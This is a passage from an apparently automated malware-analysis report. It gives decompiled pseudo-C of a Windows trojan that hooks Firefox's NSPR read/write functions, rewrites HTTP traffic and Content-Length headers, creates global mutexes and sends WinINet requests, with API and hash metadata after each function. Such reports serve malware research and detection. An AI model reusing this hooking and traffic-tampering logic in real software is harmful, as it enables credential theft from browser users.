    										_t128 = 0x422a70;
    										goto L14;
    									}
    								} else {
    									_t128 =  &_v1748;
    									L14:
    									_t129 = _t123;
    									E00411D62(_t89 | 0xffffffff, _t128, _t129);
    									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
    									__eflags = _t140 - 0xffffffff;
    									if(_t140 == 0xffffffff) {
    										L28:
    										E00416D1C(_t123);
    										goto L29;
    									} else {
    										_v1760 = E00416CF5(_t128, _t140);
    										_t134 = _t129;
    										CloseHandle(_t140);
    										__eflags = _v1760 - 0xffffffff;
    										if(_v1760 != 0xffffffff) {
    											L17:
    											__eflags = _t134;
    											if(__eflags > 0) {
    												goto L28;
    											} else {
    												if(__eflags < 0) {
    													L20:
    													__eflags = lstrcmpiW(_t123,  &_v1748);
    													if(__eflags == 0) {
    														goto L24;
    													} else {
    														_t141 = E0040634D(_t128, __eflags, 0x8793aef2, 2);
    														__eflags = _t141;
    														if(_t141 == 0) {
    															L29:
    															_t131 = _a4;
    															_t84 = 0x7530;
    														} else {
    															_t101 = MoveFileExW(_t123,  &_v1748, 0xb);
    															__eflags = _t101;
    															if(_t101 == 0) {
    																goto L29;
    															} else {
    																E00415194(_t141);
    																__eflags = _t101 | 0xffffffff;
    																_t128 =  &_v1752;
    																_t129 = _t123;
    																E00411D62(_t101 | 0xffffffff,  &_v1752, _t123);
    																goto L24;
    															}
    														}
    													}
    												} else {
    													__eflags = _v1756 - 0xffffffff;
    													if(_v1756 > 0xffffffff) {
    														goto L28;
    													} else {
    														goto L20;
    													}
    												}
    											}
    										} else {
    											__eflags = _t134;
    											if(_t134 == 0) {
    												goto L28;
    											} else {
    												goto L17;
    											}
    										}
    									}
    								}
    							}
    							_t85 = WaitForSingleObject( *0x4229f4, _t84);
    							__eflags = _t85 - 0x102;
    						} while (_t85 == 0x102);
    					}
    					E00415194(_v1788);
    					_t136 = 0;
    				} else {
    					_t136 = 1;
    				}
    				E004119C1(_t131);
    				return _t136;
    			}

    APIs
      • Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E
    • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000003C0,?,?,00000102), ref: 0040B501
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0040B53A
    • CloseHandle.KERNEL32(00000000,00000000), ref: 0040B558
    • lstrcmpiW.KERNEL32(?,?), ref: 0040B588
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
    • String ID: p*B
    • API String ID: 503543330-1544117718
    • Opcode ID: 056f82d34aff28ca028f2a022eeb68c07da50eb6aeda69f8d491d49d341cbed6
    • Instruction ID: bbb6fb77884f24ea0f7cb2fe9583bd22383439c6261d9df05538de9bdb08ad0d
    • Opcode Fuzzy Hash: 056f82d34aff28ca028f2a022eeb68c07da50eb6aeda69f8d491d49d341cbed6
    • Instruction Fuzzy Hash: 6771BE71508341ABC320DF64C885AAFB7E8EF81714F140A3EF995A62E1D739D945878E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E004051AB(intOrPtr __ecx, void* __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr _v28;
    				char _v92;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t22;
    				void* _t25;
    				long _t27;
    				void* _t28;
    				long _t29;
    				void* _t33;
    				void* _t39;
    				void* _t41;
    				void* _t44;
    				long _t49;
    				void* _t50;
    				void* _t57;
    				void* _t62;
    				void* _t69;
    				void* _t73;
    				WCHAR* _t77;
    				void* _t78;
    				void* _t80;
    				void* _t82;
    
    				_t73 = __edx;
    				_t70 = __ecx;
    				_t22 = E0040634D(__ecx, __eflags, 0x743c1521, 2);
    				_v28 = _t22;
    				if(_t22 != 0) {
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t25 = E00406473();
    					__eflags = _t25;
    					if(_t25 == 0) {
    						L24:
    						E00415194(_v28);
    						__eflags = 0;
    						return 0;
    					}
    					_t27 = WaitForSingleObject( *0x4229f4, 0xea60);
    					__eflags = _t27 - 0x102;
    					if(_t27 != 0x102) {
    						goto L24;
    					}
    					do {
    						_t28 = E00419E1D(_t70);
    						_v24 = _t28;
    						__eflags = _t28;
    						if(__eflags == 0) {
    							goto L22;
    						}
    						_t80 = E0041752D( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
    						_v20 = _t80;
    						__eflags = _t80;
    						if(__eflags == 0) {
    							L21:
    							E004119C1(_v20);
    							E004119C1(_v24);
    							goto L22;
    						}
    						_t70 = _v16;
    						_t33 = E00404C40(_v16, __eflags, _t80);
    						__eflags = _t33;
    						if(_t33 == 0) {
    							goto L21;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_v8 = E00412891(_t80, 1);
    							_v12 = E00412891(_t80, 2);
    							_t39 = E00412D70(_t80, E004124FE(_t80));
    							_t72 = _v8;
    							_t41 = E00412D70(_t72, E004124FE(_v8));
    							_t70 = _v12;
    							_push(E00412D70(_t70, E004124FE(_v12)));
    							_push(_t41);
    							_push(_t39);
    							_push(L"Global\\%08X%08X%08X");
    							_t73 = 0x20;
    							_t77 =  &_v92;
    							_t44 = E004126B4(_t43, _t73, _t77);
    							_t82 = _t82 + 0x10;
    							__eflags = _t44 - 0x1f;
    							if(_t44 != 0x1f) {
    								goto L20;
    							}
    							_t69 = CreateMutexW(0x422568, 1, _t77);
    							__eflags = _t69;
    							if(_t69 == 0) {
    								goto L20;
    							}
    							_t49 = GetLastError();
    							__eflags = _t49 - 0xb7;
    							if(_t49 == 0xb7) {
    								CloseHandle(_t69);
    								_t69 = 0;
    								__eflags = 0;
    							}
    							__eflags = _t69;
    							if(_t69 != 0) {
    								_t50 = 0x10;
    								_t78 = E00411991(_t50);
    								__eflags = _t78;
    								if(_t78 == 0) {
    									L19:
    									E00415194(_t69);
    									goto L20;
    								}
    								 *_t78 = E00411E1F(_t51 | 0xffffffff, _t80);
    								 *(_t78 + 4) = E00411E1F(_t53 | 0xffffffff, _v8);
    								_t57 = E00411E1F(_t55 | 0xffffffff, _v12);
    								__eflags =  *_t78;
    								 *(_t78 + 8) = _t57;
    								 *(_t78 + 0xc) = _t69;
    								if( *_t78 == 0) {
    									L18:
    									E004119C1( *_t78);
    									E004119C1( *(_t78 + 4));
    									E004119C1( *(_t78 + 8));
    									E004119C1(_t78);
    									goto L19;
    								}
    								__eflags =  *(_t78 + 4);
    								if( *(_t78 + 4) == 0) {
    									goto L18;
    								}
    								__eflags = _t57;
    								if(_t57 == 0) {
    									goto L18;
    								}
    								_t62 = E004133F6(0x80000, E00404F00, _t78);
    								__eflags = _t62;
    								if(_t62 != 0) {
    									goto L20;
    								}
    								goto L18;
    							}
    							L20:
    							_t80 = E00412891(_t80, 3);
    							__eflags = _t80;
    						} while (_t80 != 0);
    						goto L21;
    						L22:
    						_t29 = WaitForSingleObject( *0x4229f4, 0xea60);
    						__eflags = _t29 - 0x102;
    					} while (_t29 == 0x102);
    					goto L24;
    				}
    				return _t22 + 1;
    			}

    APIs
      • Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E
    • GetCurrentThread.KERNEL32 ref: 004051CC
    • SetThreadPriority.KERNEL32(00000000), ref: 004051D3
    • WaitForSingleObject.KERNEL32(0000EA60), ref: 004051F1
    • CreateMutexW.KERNEL32(00422568,00000001,?,20000000), ref: 004052B4
    • GetLastError.KERNEL32 ref: 004052C4
    • CloseHandle.KERNEL32(00000000), ref: 004052D2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
    • String ID: Global\%08X%08X%08X
    • API String ID: 3448221409-3239447729
    • Opcode ID: b797ca54c87a9714b055ca159847229bec48e52bdda72b341665097598410841
    • Instruction ID: ee61de3a0adadf53f9f8b42730de25b573b55bc7201569590c8ca3ffbffe1920
    • Opcode Fuzzy Hash: b797ca54c87a9714b055ca159847229bec48e52bdda72b341665097598410841
    • Instruction Fuzzy Hash: 4941F4B1A00B05BADB117BB59D46BAF7665EF40754F14053BFA10F62E2CBBC8C908A5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E0041C50A(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _v8;
    				char _v12;
    				char _v16;
    				_Unknown_base(*)()* _v20;
    				intOrPtr _v24;
    				char _v40;
    				char _v60;
    				char _v84;
    				char _v112;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t30;
    				_Unknown_base(*)()* _t42;
    				intOrPtr _t44;
    				intOrPtr _t50;
    				intOrPtr* _t55;
    				void* _t57;
    				void* _t58;
    				intOrPtr* _t59;
    				CHAR* _t61;
    				CHAR* _t62;
    				CHAR* _t63;
    				_Unknown_base(*)()* _t64;
    				WCHAR* _t66;
    				void* _t68;
    
    				_t58 = __ecx;
    				_t66 =  &_v112;
    				E00419DD3(0xdd, _t66);
    				_t30 = LoadLibraryW(_t66);
    				_v8 = _t30;
    				if(_t30 == 0) {
    					return _t30;
    				}
    				_t61 =  &_v84;
    				E00419D9D(0xde, _t61);
    				_t55 = GetProcAddress(_v8, _t61);
    				_t62 =  &_v40;
    				E00419D9D(0xdf, _t62);
    				_v20 = GetProcAddress(_v8, _t62);
    				_t63 =  &_v60;
    				E00419D9D(0xe0, _t63);
    				_t42 = GetProcAddress(_v8, _t63);
    				_t68 = 0;
    				_t64 = _t42;
    				if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
    					L14:
    					return FreeLibrary(_v8);
    				} else {
    					_t44 = E0041308D(L"SeTcbPrivilege");
    					__imp__WTSGetActiveConsoleSessionId();
    					_v24 = _t44;
    					if(_t44 != 0xffffffff) {
    						E0041C499(_t58, 0, _t64, _t44, _a4, _a8);
    					}
    					_push( &_v12);
    					_push( &_v16);
    					_push(1);
    					_push(_t68);
    					_push(_t68);
    					if( *_t55() == 0) {
    						goto L14;
    					} else {
    						_t57 = 0;
    						if(_v12 <= _t68) {
    							L13:
    							_v20(_v16);
    							goto L14;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_t59 = _t68 + _v16;
    							_t50 =  *((intOrPtr*)(_t59 + 8));
    							if(_t50 == 0 || _t50 == 4) {
    								_t51 =  *_t59;
    								if( *_t59 != _v24) {
    									E0041C499(_t59, _t68, _t64, _t51, _a4, _a8);
    								}
    							}
    							_t57 = _t57 + 1;
    							_t68 = _t68 + 0xc;
    						} while (_t57 < _v12);
    						goto L13;
    					}
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041CEA0,?,?), ref: 0041C521
    • GetProcAddress.KERNEL32(?,?), ref: 0041C54D
    • GetProcAddress.KERNEL32(?,?), ref: 0041C564
    • GetProcAddress.KERNEL32(?,?), ref: 0041C57C
    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0041CEA0,?,?,00000000), ref: 0041C605
      • Part of subcall function 0041308D: GetCurrentThread.KERNEL32 ref: 0041309D
      • Part of subcall function 0041308D: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130A4
      • Part of subcall function 0041308D: OpenProcessToken.ADVAPI32(000000FF,00000020,0041C599,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130B6
    • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0041CEA0,?,?,00000000), ref: 0041C599
      • Part of subcall function 0041C499: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0041C5F3,00000000,?,?,?), ref: 0041C4BE
      • Part of subcall function 0041C499: CloseHandle.KERNEL32(?,?,00000000,?,0041C5F3,00000000,?,?,?), ref: 0041C4FF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
    • String ID: .exe$SeTcbPrivilege
    • API String ID: 1107370034-552748125
    • Opcode ID: 348e5b6bfaf3258e08e439ddfca0e840065b991221becb6e8d7961f8007bc020
    • Instruction ID: a7d43c2a83ef8a622bcc1519f4963d1dceded52f62e05d5ef1c558f6f218f66b
    • Opcode Fuzzy Hash: 348e5b6bfaf3258e08e439ddfca0e840065b991221becb6e8d7961f8007bc020
    • Instruction Fuzzy Hash: 24319E35A00128BBDF11ABA5DC859EEBB79EF48304F140027F801F6250C779AE80CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405DDE(void* __ecx, void* __edx, void* __eflags) {
    				long _v8;
    				signed int _v12;
    				void _v532;
    				void* __edi;
    				unsigned int _t22;
    				void* _t30;
    				void* _t39;
    				void* _t41;
    				WCHAR* _t42;
    				void* _t43;
    				void* _t46;
    
    				_t41 = __edx;
    				_t39 = __ecx;
    				InitializeCriticalSection(0x424010);
    				 *0x424004 = 0;
    				 *0x42400c = 0;
    				 *0x424008 = 0;
    				 *0x423e74 = 0;
    				 *0x423c8c = 0;
    				 *0x423c84 = 0;
    				 *0x423c88 = 0;
    				InitializeCriticalSection(0x423c6c);
    				_t42 =  &_v532;
    				E0040666E(_t39, _t42, 0);
    				_v12 = _v12 | 0xffffffff;
    				_v8 = 0x1fe;
    				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t43 != 0xffffffff) {
    					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
    						_v12 = _v8;
    					}
    					CloseHandle(_t43);
    				}
    				_t22 = _v12;
    				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
    					_t22 = 0;
    				}
    				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
    				E0041B442( &_v532);
    				E0040733E( &_v532);
    				 *0x422a4c = 0;
    				 *0x422a68 = 0;
    				InitializeCriticalSection(0x422a50);
    				E0041AB48(_t41);
    				if(GetModuleHandleW(L"nspr4.dll") == 0) {
    					_t30 = 0;
    				} else {
    					_t30 = E00419A5A(0, _t41, _t29);
    				}
    				if(_t30 != 0) {
    					 *0x422a48 =  *0x422a48 | 0x00000001;
    				}
    				E00419823();
    				return 1;
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(00424010,00000000,75144EE0,00000000), ref: 00405DF5
    • InitializeCriticalSection.KERNEL32(00423C6C), ref: 00405E2A
      • Part of subcall function 0040666E: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422590,00000000,00000032,?,77A19EB0,00000000), ref: 004066E7
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00405E52
    • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00405E6F
    • CloseHandle.KERNEL32(00000000), ref: 00405E80
    • InitializeCriticalSection.KERNEL32(00422A50), ref: 00405EC7
    • GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00405ED3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
    • String ID: nspr4.dll
    • API String ID: 1155594396-741017701
    • Opcode ID: d29a6554a3e0eaa30e0a8dd9eb70e05daf081a764cc1f17d3c63ea90e9f2ed76
    • Instruction ID: a71a5b26871d3e3324adec9d0cb20ef8ba2cc99f634e81acd0de4dc19795af69
    • Opcode Fuzzy Hash: d29a6554a3e0eaa30e0a8dd9eb70e05daf081a764cc1f17d3c63ea90e9f2ed76
    • Instruction Fuzzy Hash: 83319131A40208AAD720AF69ED85A9E7BB8EB44314F50057FE515F22E0D6784F868F98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E004136A9(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
    				long _t18;
    				char* _t21;
    				signed int _t29;
    				char* _t30;
    				void* _t32;
    
    				_t29 = _a20 & 0x00000002;
    				_t18 = 0x8404f700;
    				if(_t29 != 0) {
    					_t18 = 0x8444f700;
    				}
    				if((_a20 & 0x00000004) != 0) {
    					_t18 = _t18 | 0x00800000;
    				}
    				_t30 = "POST";
    				if((_a20 & 0x00000001) == 0) {
    					_t30 = "GET";
    				}
    				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x422388, _t18, 0);
    				if(_t32 == 0) {
    					L15:
    					return 0;
    				} else {
    					if(_t29 == 0) {
    						_push(0x13);
    						_t21 = "Connection: close\r\n";
    						_pop(0);
    					} else {
    						_t21 = 0;
    					}
    					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
    						L14:
    						InternetCloseHandle(_t32);
    						goto L15;
    					} else {
    						_a20 = _a20 & 0x00000000;
    						_a8 = 4;
    						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
    							goto L14;
    						} else {
    							return _t32;
    						}
    					}
    				}
    			}

    APIs
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422388,8404F700,00000000), ref: 004136F1
    • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00413718
    • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0041373D
    • InternetCloseHandle.WININET(00000000), ref: 00413755
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: Connection: close$GET$HTTP/1.1$POST
    • API String ID: 3080274660-1621676011
    • Opcode ID: 697284514f0cbda9bab7aceec8b234b908501337a057423e04b85b484785ea8a
    • Instruction ID: be86e865f83e421b307636e8b1c28f4dc15ebd08fecf420eabd819dadbd0a758
    • Opcode Fuzzy Hash: 697284514f0cbda9bab7aceec8b234b908501337a057423e04b85b484785ea8a
    • Instruction Fuzzy Hash: 8B11D3B12002097BEB258F548C45FE73A9CAB14746F108026FE01EA2E0D7B9DB9487EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00419A5A(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
    				void* __ebx;
    				_Unknown_base(*)()* _t4;
    				void* _t9;
    				void* _t10;
    				void* _t11;
    				void* _t12;
    
    				_t12 = __edx;
    				_t11 = __ecx;
    				 *0x422348 = GetProcAddress(__edi, "PR_OpenTCPSocket");
    				 *0x422358 = GetProcAddress(__edi, "PR_Close");
    				 *0x422368 = GetProcAddress(__edi, "PR_Read");
    				_t4 = GetProcAddress(__edi, "PR_Write");
    				_push(0x422348);
    				_t9 = 4;
    				 *0x422378 = _t4;
    				_t10 = E00419792(_t9, _t11, _t12);
    				if(_t10 != 0) {
    					E004073F7(__edi,  *0x422350,  *0x422360,  *0x422370,  *0x422380);
    				}
    				return _t10;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00419A68
    • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00419A75
    • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00419A82
    • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00419A8F
      • Part of subcall function 00419792: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77A19EB0,?,?,00419A58,00422008,00000000,00405EF8), ref: 004197C9
      • Part of subcall function 004073F7: InitializeCriticalSection.KERNEL32(00422A08,75144EE0,00419AC8,00422348), ref: 0040740D
      • Part of subcall function 004073F7: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00407449
      • Part of subcall function 004073F7: GetProcAddress.KERNEL32(PR_SetError), ref: 0040745B
      • Part of subcall function 004073F7: GetProcAddress.KERNEL32(PR_GetError), ref: 0040746D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
    • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
    • API String ID: 1833644279-3954199073
    • Opcode ID: 7f30f8fd0cb29c9c797ad9e7429eb4daca6c8da34ec980934206e59010315a5c
    • Instruction ID: 2957d938e739e937d3a346bfc973f1a0bccafc9e1fe7d701533809f1fcd982a2
    • Opcode Fuzzy Hash: 7f30f8fd0cb29c9c797ad9e7429eb4daca6c8da34ec980934206e59010315a5c
    • Instruction Fuzzy Hash: 21F09072B803507ACB20BF766D45E527FACBB49B60394007BF900A71B0D6FD8482DA0C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E00407BE6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v20;
    				void* _v24;
    				void* _v28;
    				char _v36;
    				char _v40;
    				signed int _v44;
    				void* _v48;
    				signed int _v52;
    				void* _v56;
    				intOrPtr _v60;
    				void* _v72;
    				void* _v80;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t99;
    				signed int _t100;
    				signed int _t101;
    				intOrPtr _t103;
    				void* _t104;
    				signed int _t107;
    				signed int _t108;
    				signed int _t110;
    				intOrPtr _t119;
    				void* _t131;
    				signed int _t139;
    				void* _t149;
    				struct _CRITICAL_SECTION* _t153;
    				intOrPtr _t155;
    				signed int _t168;
    				signed int _t174;
    				char _t176;
    				void* _t177;
    				intOrPtr _t179;
    				void* _t182;
    				signed int _t183;
    				intOrPtr _t186;
    				void* _t188;
    				signed int _t189;
    				void* _t191;
    				void* _t192;
    				void* _t193;
    				signed int _t195;
    				void* _t197;
    				void* _t199;
    
    				_t197 = (_t195 & 0xfffffff8) - 0x34;
    				_t99 = E00406473();
    				_t179 = _a4;
    				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
    					L40:
    					_t100 =  *0x422a2c(_t179, _a8, _a12);
    					goto L41;
    				} else {
    					_t153 = 0x422a08;
    					EnterCriticalSection(0x422a08);
    					_t101 = E00406F84(_t179);
    					if(_t101 == 0xffffffff) {
    						L39:
    						LeaveCriticalSection(_t153);
    						goto L40;
    					}
    					_t103 = _t101 * 0x38 +  *0x422a24;
    					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
    						L32:
    						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
    						_t85 = _t103 + 0x2c; // -4336120
    						_t173 = _t85;
    						__eflags = _a12 - _t182;
    						_t183 = _a12 < _t182 ? _a12 : _t182;
    						_t104 = E004119FD(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
    						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
    						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
    						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
    							E00411A74(E004119C1( *_t173), _t173, 0, 0xc);
    						}
    						LeaveCriticalSection(_t153);
    						_t100 = _t183;
    						L41:
    						return _t100;
    					}
    					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
    						goto L39;
    					}
    					LeaveCriticalSection(0x422a08);
    					_t107 =  *0x422a2c(_t179, _a8, _a12);
    					_t199 = _t197 + 0xc;
    					_v52 = _t107;
    					if(_t107 <= 0xffffffff) {
    						L38:
    						_t100 = _v52;
    						goto L41;
    					}
    					EnterCriticalSection(0x422a08);
    					_t108 = E00406F84(_t179);
    					_t174 = _t108;
    					if(_t174 == 0xffffffff) {
    						L35:
    						_push(8);
    						_push(0xffffe890);
    						L36:
    						 *0x422a04();
    						_v52 = _v52 | 0xffffffff;
    						L37:
    						LeaveCriticalSection(_t153);
    						goto L38;
    					}
    					_t168 = _v52;
    					if(_t168 == 0) {
    						L11:
    						_t176 = _t174 * 0x38 +  *0x422a24;
    						_v36 = _t176;
    						if(_t168 > 0) {
    							E004119FD( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
    							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
    						}
    						_t110 = E0040780A(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
    						_v52 = _t110;
    						if(_t110 == 1) {
    							_t119 = E004079B4( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
    							_v60 = _t119;
    							if(_t119 == 1) {
    								if(E00418EB0( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
    									_t155 = _v40;
    									_t186 = E00411991( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
    									_v40 = _t186;
    									if(_t186 != 0) {
    										_t131 = E004119FD(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
    										_push(_t155);
    										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
    											E0041216A(_t199 + 0x28);
    											_t188 = E00416964(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
    											E004119FD(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
    											_t189 = _t188 + _t155;
    											__eflags = _t189;
    										} else {
    											_push("%x\r\n");
    											_t191 = _t186 + _t131;
    											_t177 = 0xd;
    											_t192 = _t191 + E004126F8(_t131, _t177, _t191);
    											E004119FD(_t192, _v48, _t155);
    											_t193 = _t192 + _t155;
    											E004119FD(_t193, "\r\n0\r\n\r\n", 7);
    											_t176 = _v60;
    											_t189 = _t193 + 7;
    										}
    										_t137 =  *((intOrPtr*)(_t176 + 0x18));
    										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
    											_t189 = _t189 + E004119FD(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
    										}
    										E004119C1( *((intOrPtr*)(_t176 + 0x14)));
    										_t139 = _v44;
    										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
    										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
    									}
    								}
    								_v44 = _v44 | 0xffffffff;
    								E004119C1(_v48);
    							}
    							_t153 = 0x422a08;
    						}
    						if(_v52 <= 0) {
    							L29:
    							if(__eflags == 0) {
    								L31:
    								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
    								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
    								 *((intOrPtr*)(_t176 + 0x34)) = 0;
    								 *((intOrPtr*)(_t176 + 0x14)) = 0;
    								 *((intOrPtr*)(_t176 + 0x18)) = 0;
    								E004193CE( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
    								_t103 = _v40;
    								 *((intOrPtr*)(_t176 + 0x10)) = 0;
    								 *((intOrPtr*)(_t176 + 0xc)) = 0;
    								goto L32;
    							}
    							__eflags = _v44 - 0xffffffff;
    							if(_v44 != 0xffffffff) {
    								goto L37;
    							}
    							goto L31;
    						} else {
    							if(_v44 != 0) {
